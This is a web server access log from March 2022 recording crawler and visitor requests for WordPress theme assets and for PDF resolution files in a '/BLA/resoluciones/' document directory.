207.46.13.192 - - [20/Mar/2022:18:44:57 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.31 - - [20/Mar/2022:18:44:59 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
207.46.13.192 - - [20/Mar/2022:18:45:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.186 - - [20/Mar/2022:18:45:00 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
40.77.167.78 - - [20/Mar/2022:18:45:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
207.46.13.31 - - [20/Mar/2022:18:45:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
207.46.13.192 - - [20/Mar/2022:18:45:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.186 - - [20/Mar/2022:18:45:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
40.77.167.41 - - [20/Mar/2022:18:45:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
207.46.13.31 - - [20/Mar/2022:18:45:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
207.46.13.186 - - [20/Mar/2022:18:45:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
207.46.13.192 - - [20/Mar/2022:18:45:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
40.77.167.41 - - [20/Mar/2022:18:45:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
207.46.13.31 - - [20/Mar/2022:18:45:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
207.46.13.186 - - [20/Mar/2022:18:45:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
207.46.13.192 - - [20/Mar/2022:18:45:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
40.77.167.41 - - [20/Mar/2022:18:45:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
207.46.13.31 - - [20/Mar/2022:18:45:10 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
207.46.13.192 - - [20/Mar/2022:18:45:11 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
40.77.167.41 - - [20/Mar/2022:18:45:13 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
207.46.13.178 - - [20/Mar/2022:18:45:13 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
207.46.13.192 - - [20/Mar/2022:18:45:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
207.46.13.43 - - [20/Mar/2022:18:45:15 -0500] "GET /bla/resoluciones/resoluciones%202014/0614.pdf HTTP/1.1" 200 841697
207.46.13.178 - - [20/Mar/2022:18:45:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
207.46.13.178 - - [20/Mar/2022:18:45:19 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
207.46.13.178 - - [20/Mar/2022:18:45:22 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
186.114.114.8 - - [20/Mar/2022:18:45:35 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.114.114.8 - - [20/Mar/2022:18:46:08 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 12235
186.114.114.8 - - [20/Mar/2022:18:46:08 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
216.245.221.92 - - [20/Mar/2022:18:46:13 -0500] "HEAD / HTTP/1.1" 200 -
186.114.114.8 - - [20/Mar/2022:18:46:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2679.pdf HTTP/1.1" 200 1158440
186.28.189.55 - - [20/Mar/2022:18:46:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.189.55 - - [20/Mar/2022:18:46:41 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
207.46.13.179 - - [20/Mar/2022:18:46:42 -0500] "GET /bla/resoluciones/notificaciones/registros%202015/0770.doc HTTP/1.1" 200 203776
186.28.189.55 - - [20/Mar/2022:18:46:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2010.pdf HTTP/1.1" 200 1164744
66.249.73.127 - - [20/Mar/2022:18:49:52 -0500] "-" 408 -
207.46.13.209 - - [20/Mar/2022:18:51:07 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/4566.pdf HTTP/1.1" 200 328230
216.245.221.92 - - [20/Mar/2022:18:51:13 -0500] "HEAD / HTTP/1.1" 200 -
186.28.189.55 - - [20/Mar/2022:18:51:52 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
